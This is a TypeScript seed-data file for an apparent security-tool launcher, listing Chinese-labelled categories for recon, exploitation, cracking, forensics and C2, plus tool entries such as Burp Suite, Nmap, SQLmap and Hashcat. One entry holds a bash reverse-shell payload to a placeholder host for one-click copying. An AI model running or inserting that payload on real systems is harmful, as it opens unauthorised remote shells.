import { Category, Tag, Tool, AppSettings } from '../../types';

export const SEED_CATEGORIES: Category[] = [
  // 1. 信息收集
  {
    id: 'cat-1',
    name: '信息收集',
    slug: 'info-gathering',
    description: '子域名枚举、端口探测、空间资产测绘与网络指纹识别',
    icon: 'Radar',
    color: '#38bdf8',
    sortOrder: 1,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-1-1',
    name: '子域名与资产枚举',
    slug: 'subdomains',
    description: 'DNS 爆破、证书透明度日志检索与企业组织资产发现',
    icon: 'Globe',
    color: '#38bdf8',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-1',
  },
  {
    id: 'cat-1-2',
    name: '端口与服务探测',
    slug: 'port-services',
    description: '全端口扫描、服务版本指纹研判与存活网络探测',
    icon: 'Radar',
    color: '#38bdf8',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-1',
  },
  {
    id: 'cat-1-3',
    name: '指纹识别与空间测绘',
    slug: 'fingerprinting',
    description: 'Web 指纹、CMS 识别与空间搜索引擎接口探测',
    icon: 'Search',
    color: '#38bdf8',
    sortOrder: 3,
    isSystem: true,
    parentId: 'cat-1',
  },

  // 2. Web安全
  {
    id: 'cat-2',
    name: 'Web安全',
    slug: 'web-sec',
    description: '抓包代理、Web漏洞挖掘、SQL注入与API自动化审计',
    icon: 'Globe',
    color: '#10b981',
    sortOrder: 2,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-2-1',
    name: '抓包代理与重放',
    slug: 'proxy-replay',
    description: '中间人代理、流量重放、请求改包与交互式测试',
    icon: 'Shield',
    color: '#10b981',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-2',
  },
  {
    id: 'cat-2-2',
    name: '漏洞扫描与审计',
    slug: 'vuln-scanner',
    description: 'Web 应用自动化缺陷扫描、XSS 与未授权检测',
    icon: 'Search',
    color: '#10b981',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-2',
  },
  {
    id: 'cat-2-3',
    name: 'SQL注入与数据挖掘',
    slug: 'sqli-injection',
    description: '数据库自动化注入检测、报错脱裤与盲注利用',
    icon: 'Terminal',
    color: '#10b981',
    sortOrder: 3,
    isSystem: true,
    parentId: 'cat-2',
  },

  // 3. 漏洞利用
  {
    id: 'cat-3',
    name: '漏洞利用',
    slug: 'exploit',
    description: 'PoC验证框架、EXP执行终端、权限获取与利用套件',
    icon: 'Zap',
    color: '#f59e0b',
    sortOrder: 3,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-3-1',
    name: 'PoC验证与框架',
    slug: 'poc-framework',
    description: '单点漏洞利用脚本、Nuclei 模板与攻击框架集',
    icon: 'Zap',
    color: '#f59e0b',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-3',
  },
  {
    id: 'cat-3-2',
    name: 'Payload生成与投递',
    slug: 'payload-delivery',
    description: 'Shell 发生器、混淆编码器与反弹载荷投递',
    icon: 'FileCode',
    color: '#f59e0b',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-3',
  },

  // 4. 逆向分析
  {
    id: 'cat-4',
    name: '逆向分析',
    slug: 'reverse-eng',
    description: '反编译、动态调试、二进制静态审查与恶意代码分析',
    icon: 'Cpu',
    color: '#a855f7',
    sortOrder: 4,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-4-1',
    name: '反编译与反汇编',
    slug: 'decompiler',
    description: 'Ghidra / IDA / Jadx 等静态分析与反编译工具',
    icon: 'Cpu',
    color: '#a855f7',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-4',
  },
  {
    id: 'cat-4-2',
    name: '动态调试与内存剖析',
    slug: 'debugger',
    description: 'x64dbg / Frida / 进程注入与内存实时分析',
    icon: 'Activity',
    color: '#a855f7',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-4',
  },

  // 5. 密码破解
  {
    id: 'cat-5',
    name: '密码破解',
    slug: 'password',
    description: '哈希识别、字典穷举爆破与凭证恢复工具',
    icon: 'Key',
    color: '#ef4444',
    sortOrder: 5,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-5-1',
    name: '哈希离线破解',
    slug: 'hash-recovery',
    description: 'Hashcat / John the Ripper GPU 高速哈希破解',
    icon: 'Key',
    color: '#ef4444',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-5',
  },
  {
    id: 'cat-5-2',
    name: '在线服务爆破',
    slug: 'online-bruteforce',
    description: 'SSH / RDP / FTP / SMB 多协议并发密码穷举',
    icon: 'Lock',
    color: '#ef4444',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-5',
  },

  // 6. 流量取证
  {
    id: 'cat-6',
    name: '流量取证',
    slug: 'forensics',
    description: '网络数据包捕获、流量重放、内存取证与日志溯源',
    icon: 'Activity',
    color: '#06b6d4',
    sortOrder: 6,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-6-1',
    name: '网络报文分析',
    slug: 'packet-analysis',
    description: 'Wireshark / PCAP 报文剖析与异常协议检测',
    icon: 'Activity',
    color: '#06b6d4',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-6',
  },
  {
    id: 'cat-6-2',
    name: '主机取证与溯源',
    slug: 'host-forensics',
    description: 'Volatility 内存转储、系统日志与证据链固定',
    icon: 'FileText',
    color: '#06b6d4',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-6',
  },

  // 7. 权限维持
  {
    id: 'cat-7',
    name: '权限维持',
    slug: 'persistence',
    description: '红队C2基础设施、端口转发、隐蔽隧道与域提权',
    icon: 'ShieldAlert',
    color: '#ec4899',
    sortOrder: 7,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-7-1',
    name: 'C2设施与管理',
    slug: 'c2-framework',
    description: '远控客户端、上线节点控制台与信标管理',
    icon: 'ShieldAlert',
    color: '#ec4899',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-7',
  },
  {
    id: 'cat-7-2',
    name: '内网穿透与隧道',
    slug: 'tunnel-proxy',
    description: 'FRP / NPS / 端口转发与加密流量隐蔽出网',
    icon: 'Share2',
    color: '#ec4899',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-7',
  },

  // 8. 综合与备忘
  {
    id: 'cat-8',
    name: '综合与备忘',
    slug: 'notes',
    description: '在线多功能编解码编排、速查手册与常用Payload备忘',
    icon: 'Bookmark',
    color: '#64748b',
    sortOrder: 8,
    isSystem: true,
    parentId: null,
  },
  {
    id: 'cat-8-1',
    name: '多功能编解码台',
    slug: 'encoding-workbench',
    description: 'Base64 / Hex / URL / 哈希与密文组合转换',
    icon: 'Binary',
    color: '#64748b',
    sortOrder: 1,
    isSystem: true,
    parentId: 'cat-8',
  },
  {
    id: 'cat-8-2',
    name: '常用备忘与速查手册',
    slug: 'cheatsheets',
    description: '内网命令、常用端口列表与渗透速查清单',
    icon: 'Bookmark',
    color: '#64748b',
    sortOrder: 2,
    isSystem: true,
    parentId: 'cat-8',
  },
];

export const SEED_TAGS: Tag[] = [
  { id: 'tag-1', name: 'recon', color: '#38bdf8' },
  { id: 'tag-2', name: 'port-scan', color: '#38bdf8' },
  { id: 'tag-3', name: 'proxy', color: '#10b981' },
  { id: 'tag-4', name: 'sqli', color: '#10b981' },
  { id: 'tag-5', name: 'fuzzing', color: '#10b981' },
  { id: 'tag-6', name: 'poc', color: '#f59e0b' },
  { id: 'tag-7', name: 'c2', color: '#ec4899' },
  { id: 'tag-8', name: 'reversing', color: '#a855f7' },
  { id: 'tag-9', name: 'decompiler', color: '#a855f7' },
  { id: 'tag-10', name: 'hashcat', color: '#ef4444' },
  { id: 'tag-11', name: 'wireshark', color: '#06b6d4' },
  { id: 'tag-12', name: 'pcap', color: '#06b6d4' },
  { id: 'tag-13', name: 'tunnel', color: '#ec4899' },
  { id: 'tag-14', name: 'cheat-sheet', color: '#64748b' },
  { id: 'tag-15', name: 'encoding', color: '#64748b' },
  { id: 'tag-16', name: 'red-team', color: '#ef4444' },
  { id: 'tag-17', name: 'blue-team', color: '#38bdf8' },
];

export const SEED_TOOLS: Tool[] = [
  {
    id: 'tool-1',
    name: 'Burp Suite Professional',
    description: '行业标杆级 Web 安全测试抓包与重放交互式代理工具',
    type: 'exe',
    categoryId: 'cat-2',
    subcategoryId: 'cat-2-1',
    tags: ['proxy', 'fuzzing', 'red-team'],
    targetPath: 'C:\\Program Files\\BurpSuitePro\\BurpSuitePro.exe',
    defaultArgs: '',
    workingDir: 'C:\\Program Files\\BurpSuitePro',
    platform: 'windows',
    icon: 'Shield',
    color: '#ff6600',
    isFavorite: true,
    sortOrder: 1,
    usageCount: 142,
    lastUsedAt: new Date(Date.now() - 3600000).toISOString(),
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
    notes: '核心常驻工具，日常渗透测试首选代理。',
  },
  {
    id: 'tool-2',
    name: 'Nmap Network Scanner',
    description: '网络探测、主机发现和端口漏洞审计利器',
    type: 'exe',
    categoryId: 'cat-1',
    subcategoryId: 'cat-1-2',
    tags: ['recon', 'port-scan'],
    targetPath: 'C:\\Program Files (x86)\\Nmap\\nmap.exe',
    defaultArgs: '-sV -sC -T4',
    openInTerminal: true,
    platform: 'windows',
    icon: 'Radar',
    color: '#38bdf8',
    isFavorite: true,
    sortOrder: 2,
    usageCount: 98,
    lastUsedAt: new Date(Date.now() - 7200000).toISOString(),
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
    notes: '建议常用参数：nmap -p- -sV -sC -T4 -v 目标IP',
  },
  {
    id: 'tool-3',
    name: 'Wireshark',
    description: '世界领先的跨平台网络协议剖析与报文实时抓取取证套件',
    type: 'exe',
    categoryId: 'cat-6',
    subcategoryId: 'cat-6-1',
    tags: ['wireshark', 'pcap', 'blue-team'],
    targetPath: 'C:\\Program Files\\Wireshark\\Wireshark.exe',
    platform: 'windows',
    icon: 'Activity',
    color: '#06b6d4',
    isFavorite: true,
    sortOrder: 3,
    usageCount: 76,
    lastUsedAt: new Date(Date.now() - 18000000).toISOString(),
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
  },
  {
    id: 'tool-4',
    name: 'CyberChef',
    description: 'GCHQ 开源瑞士军刀式网络数据编解码、哈希与解密分析台',
    type: 'web',
    categoryId: 'cat-8',
    subcategoryId: 'cat-8-1',
    tags: ['encoding', 'cheat-sheet'],
    targetPath: 'https://gchq.github.io/CyberChef/',
    icon: 'Globe',
    color: '#10b981',
    isFavorite: true,
    sortOrder: 4,
    usageCount: 65,
    lastUsedAt: new Date(Date.now() - 86400000).toISOString(),
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
    notes: '支持本地纯静态无网络运行，数据不出本地环境。',
  },
  {
    id: 'tool-5',
    name: 'SQLmap',
    description: '自动化 SQL 注入检测与数据库接管渗透神器',
    type: 'script',
    categoryId: 'cat-2',
    subcategoryId: 'cat-2-3',
    tags: ['sqli', 'red-team'],
    targetPath: 'C:\\Tools\\sqlmap\\sqlmap.py',
    defaultArgs: '-u "http://target/vuln.php?id=1" --batch',
    openInTerminal: true,
    platform: 'all',
    icon: 'Terminal',
    color: '#ef4444',
    isFavorite: true,
    sortOrder: 5,
    usageCount: 54,
    lastUsedAt: new Date(Date.now() - 172800000).toISOString(),
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
  },
  {
    id: 'tool-6',
    name: 'Ghidra',
    description: 'NSA 开源的多架构软件逆向工程分析与反汇编平台',
    type: 'exe',
    categoryId: 'cat-4',
    subcategoryId: 'cat-4-1',
    tags: ['reversing', 'decompiler'],
    targetPath: 'C:\\Tools\\ghidra\\ghidraRun.bat',
    platform: 'windows',
    icon: 'Cpu',
    color: '#a855f7',
    isFavorite: true,
    sortOrder: 6,
    usageCount: 38,
    lastUsedAt: new Date(Date.now() - 259200000).toISOString(),
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
  },
  {
    id: 'tool-7',
    name: 'Gobuster',
    description: '用 Go 编写的高性能 URI 目录、DNS 子域与虚拟主机爆破工具',
    type: 'exe',
    categoryId: 'cat-1',
    subcategoryId: 'cat-1-1',
    tags: ['recon', 'fuzzing'],
    targetPath: 'C:\\Tools\\gobuster\\gobuster.exe',
    defaultArgs: 'dir -u http://example.com -w common.txt',
    openInTerminal: true,
    isFavorite: false,
    sortOrder: 7,
    usageCount: 22,
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
  },
  {
    id: 'tool-8',
    name: 'Hashcat',
    description: '世界上最快且最高效的高级密码与哈希恢复引擎',
    type: 'exe',
    categoryId: 'cat-5',
    subcategoryId: 'cat-5-1',
    tags: ['hashcat'],
    targetPath: 'C:\\Tools\\hashcat\\hashcat.exe',
    defaultArgs: '-m 0 -a 0 target.hash rockyou.txt',
    openInTerminal: true,
    isFavorite: false,
    sortOrder: 8,
    usageCount: 19,
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
  },
  {
    id: 'tool-9',
    name: '反弹 Shell 指令发生器',
    description: '快速生成各语言 (Bash, Python, Netcat, PowerShell) 反弹 Shell 指令',
    type: 'cheat_sheet',
    categoryId: 'cat-3',
    subcategoryId: 'cat-3-2',
    tags: ['poc', 'red-team', 'cheat-sheet'],
    targetPath: 'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1',
    icon: 'Zap',
    color: '#f59e0b',
    isFavorite: false,
    sortOrder: 9,
    usageCount: 45,
    createdAt: new Date().toISOString(),
    updatedAt: new Date().toISOString(),
    notes: '单击即可一键拷贝标准反弹 Shell Payload。',
  },
];

export const DEFAULT_SETTINGS: AppSettings = {
  theme: 'dark',
  accentColor: '#38bdf8',
  autoLaunch: false,
  minimizeToTray: true,
  closeToTray: true,
  defaultTerminal: 'wt',
  globalShortcut: 'Alt+Space',
  storageType: 'indexeddb',
  offlineMode: true,
  developerMode: false,
};
